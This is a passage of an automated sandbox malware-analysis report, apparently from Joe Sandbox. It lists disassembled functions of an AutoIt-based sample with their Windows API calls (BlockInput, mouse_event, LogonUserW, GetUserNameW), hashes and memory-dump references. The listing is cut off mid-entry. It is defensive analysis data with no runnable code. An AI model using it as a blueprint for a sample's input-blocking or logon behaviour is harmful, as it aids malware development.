                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 3948d6a08721bfb54f434dabc38577eddfc9319dab7f18b640de458ab10efa1b
                                                            • Instruction ID: 2aafad5c9d07b44f570ac675fbddecbe764f9b5f6c87c6aae6ac3651c175de56
                                                            • Opcode Fuzzy Hash: 3948d6a08721bfb54f434dabc38577eddfc9319dab7f18b640de458ab10efa1b
                                                            • Instruction Fuzzy Hash: 86E04632000600FEE7312B60FD09E737BA9EB04350720883DB89680431CB22ACA1DB10
                                                            Function 001CA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001C8F97,?,?,?,00000001), ref: 001CA39A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001CA3A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: d92ad23ea056af1b5da4813d3b540f95a6c32d0ae9ae30da88617225d5e210be
                                                            • Instruction ID: 1e8844587800aa867b2803635618a4e519b682d0f7828df493b6e91684228986
                                                            • Opcode Fuzzy Hash: d92ad23ea056af1b5da4813d3b540f95a6c32d0ae9ae30da88617225d5e210be
                                                            • Instruction Fuzzy Hash: FCB09231054248FBCAA06BD1FD0DB883F78EB44AA2F4050B0FE0D84060CB6254528A91
                                                            Function 001CF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85be2c51f4f26d45f8aee97d185c1999b17ea60d1ea770ade77e1c9067a8e76d
                                                            • Instruction ID: e83336599cbd7e65837a3eaa14ab25c92c909f8edec4a63fd94b1bcb0fd3b87c
                                                            • Opcode Fuzzy Hash: 85be2c51f4f26d45f8aee97d185c1999b17ea60d1ea770ade77e1c9067a8e76d
                                                            • Instruction Fuzzy Hash: 9D324762D29F454DDB239634D836336A25AAFB73C8F15D73BF819B59A6EB28C4834100
                                                            Function 001D267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe03ad7b1f6e862ee7c0282be984ab3c679fb02419bf2f08a1f17b9bef3541fc
                                                            • Instruction ID: f2213195633458145a319c4a6c50819f05fb9fa8ea736e4a5fb52dc80925cb1d
                                                            • Opcode Fuzzy Hash: fe03ad7b1f6e862ee7c0282be984ab3c679fb02419bf2f08a1f17b9bef3541fc
                                                            • Instruction Fuzzy Hash: 28B12220E2AF414DD32396399835336BB4CAFBB2C5F51D72BFC6670E22EB2285834141
                                                            Function 002141FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00214218
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: a4a313cbfe858c5d166cd025574415083b9d5ad382f66eaa452194337b379610
                                                            • Instruction ID: 1a37d262652d867b27b54feeff2262cdb04bf429fa23ec9bf3295466a5b98bef
                                                            • Opcode Fuzzy Hash: a4a313cbfe858c5d166cd025574415083b9d5ad382f66eaa452194337b379610
                                                            • Instruction Fuzzy Hash: 94E048352501145FC710EF59D444A9AF7ECEF65760F008026FC4DC7351DBB0E8818B90
                                                            Function 00204EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00204F18
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 5584e73e675d562cc740e89383558646dc9cd1a242cc85d2bb4e9d40bed87fd6
                                                            • Instruction ID: 1e2b1e4ef383cc1892f2cd32482d6541f943a8c7249f153043a18a19320c1cd0
                                                            • Opcode Fuzzy Hash: 5584e73e675d562cc740e89383558646dc9cd1a242cc85d2bb4e9d40bed87fd6
                                                            • Instruction Fuzzy Hash: EDD067F417470779EA286F20AC1FF761109A350791F94D9997301958D398E578B1A435
                                                            Function 001F8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001F88D1), ref: 001F8CB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: b2e5f63804ba767cbd071f24db71957f23eb7985e97cdbacd3e74f37409d3f5e
                                                            • Instruction ID: 3d74f7ffa0b902aaa0dd86c3a64931d422b492909a73f9d118d758dff6662816
                                                            • Opcode Fuzzy Hash: b2e5f63804ba767cbd071f24db71957f23eb7985e97cdbacd3e74f37409d3f5e
                                                            • Instruction Fuzzy Hash: 5BD05E3226050EBBEF018EA4ED05EAE3B69EB04B01F408121FE15D50A1C775D935AB60
                                                            Function 001E2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 001E2242
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: 06d807a95bd03cf3a24b40029143795f2205cdb9b810b07f801da4dfd70dc914
                                                            • Instruction ID: ac79ac5acdec3769226ac5fd864df2664a70e855bde83e954e520e557f1e2507
                                                            • Opcode Fuzzy Hash: 06d807a95bd03cf3a24b40029143795f2205cdb9b810b07f801da4dfd70dc914
                                                            • Instruction Fuzzy Hash: A4C04CF1800109EBDB15DB90DA88DEF77BCAB04305F104065A101F2100D7749B448A71
                                                            Function 001CA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 001CA36A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 49554b9ae55611651f41988d94ec528a8fbe4f2eefb25f1c963c54bbd251fbc5
                                                            • Instruction ID: ca61784a6c3c5c669de02e0747bf92559afe340180f8f0be879053b29c5e320b
                                                            • Opcode Fuzzy Hash: 49554b9ae55611651f41988d94ec528a8fbe4f2eefb25f1c963c54bbd251fbc5
                                                            • Instruction Fuzzy Hash: 70A0113000020CFB8A202B82FC08888BFACEA002A0B0080B0FC0C800228B32A8228A80
                                                            Function 001B8A0E Relevance: .6, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3485259feb0dc7a3c66f08216088d9764aa111d7b8204d4246669b596eda6a12
                                                            • Instruction ID: d0e5b1f7393bbc431761fd74be5eb0bf7fa6fd2cbce6e14562fa945e25c997af
                                                            • Opcode Fuzzy Hash: 3485259feb0dc7a3c66f08216088d9764aa111d7b8204d4246669b596eda6a12
                                                            • Instruction Fuzzy Hash: 4D22597050161ADBCF288F28C4D46FD7BA6FB01B44F69446ADA52CB691DB30DD81CBA4
                                                            Function 001C2405 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 2b49230c6fe21488a6598e3f7568cc9a4ff8f62e6528ac46ab88eb91bba5cfc5
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 27C183322051A30ADF2D86399474A3EBAE15AB37B131A075DE8B3CB5C5EF20D578D620
                                                            Function 001C283A Relevance: .3, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 93d96eb0b8b31b64822ffa9a2a5071ece0ee9f90d27f202b4565a6a5cfb46804
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: 6FC194322051A30ADF2D46398434A3EBBE15AB37B131A176DE4B2DB5C5EF30D538E620
                                                            Function 00217B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00217B70
                                                            • DeleteObject.GDI32(00000000), ref: 00217B82
                                                            • DestroyWindow.USER32 ref: 00217B90
                                                            • GetDesktopWindow.USER32 ref: 00217BAA
                                                            • GetWindowRect.USER32(00000000), ref: 00217BB1
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00217CF2
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00217D02
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217D4A
                                                            • GetClientRect.USER32(00000000,?), ref: 00217D56
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00217D90
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DB2
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DC5
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DD0
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DD9
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DE8
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DF1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217DF8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00217E03
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217E15
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00232CAC,00000000), ref: 00217E2B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00217E3B
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00217E61
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00217E80
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00217EA2
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0021808F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: de158184ad4bb82acae07455e88dd80b92d051810545a71c375414ea00671305
                                                            • Instruction ID: 57ba60ad32b845275f6889c74e4bbb824827a49aa92d669f43282864c209aeaf
                                                            • Opcode Fuzzy Hash: de158184ad4bb82acae07455e88dd80b92d051810545a71c375414ea00671305
                                                            • Instruction Fuzzy Hash: EE029C75910109EFDB24DFA4DD8DEAE7BB9FB49310F108169F915AB2A0CB70AD41CB60
                                                            Function 002237F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0022F910), ref: 002238AF
                                                            • IsWindowVisible.USER32(?), ref: 002238D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: 8f3292c25a20f5ecdbc9caf85a6587215ffd220417c07b8674add2abbaf2b0a7
                                                            • Instruction ID: 7ad788b3599a040baf8c78a881ea8b06c5729cd6ebb2aa889a60dcf364c17572
                                                            • Opcode Fuzzy Hash: 8f3292c25a20f5ecdbc9caf85a6587215ffd220417c07b8674add2abbaf2b0a7
                                                            • Instruction Fuzzy Hash: F1D1D234224316EBCB21EF90D451F7E77A5AFA4354F00446CB8865B3A2CB75EE5ACB41
                                                            Function 0022A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0022A89F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0022A8D0
                                                            • GetSysColor.USER32(0000000F), ref: 0022A8DC
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0022A8F6
                                                            • SelectObject.GDI32(?,?), ref: 0022A905
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0022A930
                                                            • GetSysColor.USER32(00000010), ref: 0022A938
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0022A93F
                                                            • FrameRect.USER32(?,?,00000000), ref: 0022A94E
                                                            • DeleteObject.GDI32(00000000), ref: 0022A955
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0022A9A0
                                                            • FillRect.USER32(?,?,?), ref: 0022A9D2
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022A9FD
                                                              • Part of subcall function 0022AB60: GetSysColor.USER32(00000012), ref: 0022AB99
                                                              • Part of subcall function 0022AB60: SetTextColor.GDI32(?,?), ref: 0022AB9D
                                                              • Part of subcall function 0022AB60: GetSysColorBrush.USER32(0000000F), ref: 0022ABB3
                                                              • Part of subcall function 0022AB60: GetSysColor.USER32(0000000F), ref: 0022ABBE
                                                              • Part of subcall function 0022AB60: GetSysColor.USER32(00000011), ref: 0022ABDB
                                                              • Part of subcall function 0022AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0022ABE9
                                                              • Part of subcall function 0022AB60: SelectObject.GDI32(?,00000000), ref: 0022ABFA
                                                              • Part of subcall function 0022AB60: SetBkColor.GDI32(?,00000000), ref: 0022AC03
                                                              • Part of subcall function 0022AB60: SelectObject.GDI32(?,?), ref: 0022AC10
                                                              • Part of subcall function 0022AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0022AC2F
                                                              • Part of subcall function 0022AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0022AC46
                                                              • Part of subcall function 0022AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0022AC5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 6599ae59dc939f9c18c972d442aadb5a4c0bcb026b8dd0828af19af3e99be3d7
                                                            • Instruction ID: 0cf6c2106a1cdfddbd8e3f61ebeaff0a5a974c6bb22c97bd0ed36a25777c10fa
                                                            • Opcode Fuzzy Hash: 6599ae59dc939f9c18c972d442aadb5a4c0bcb026b8dd0828af19af3e99be3d7
                                                            • Instruction Fuzzy Hash: A5A1AD72008311BFD7609FA4ED0CE6B7BB9FF88320F501A29F962961A0D774D955CB52
                                                            Function 001A2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 001A2CA2
                                                            • DeleteObject.GDI32(00000000), ref: 001A2CE8
                                                            • DeleteObject.GDI32(00000000), ref: 001A2CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 001A2CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 001A2D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 001DC68B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001DC6C4
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001DCAED
                                                              • Part of subcall function 001A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001A2036,?,00000000,?,?,?,?,001A16CB,00000000,?), ref: 001A1B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 001DCB2A
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001DCB41
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001DCB57
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001DCB62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
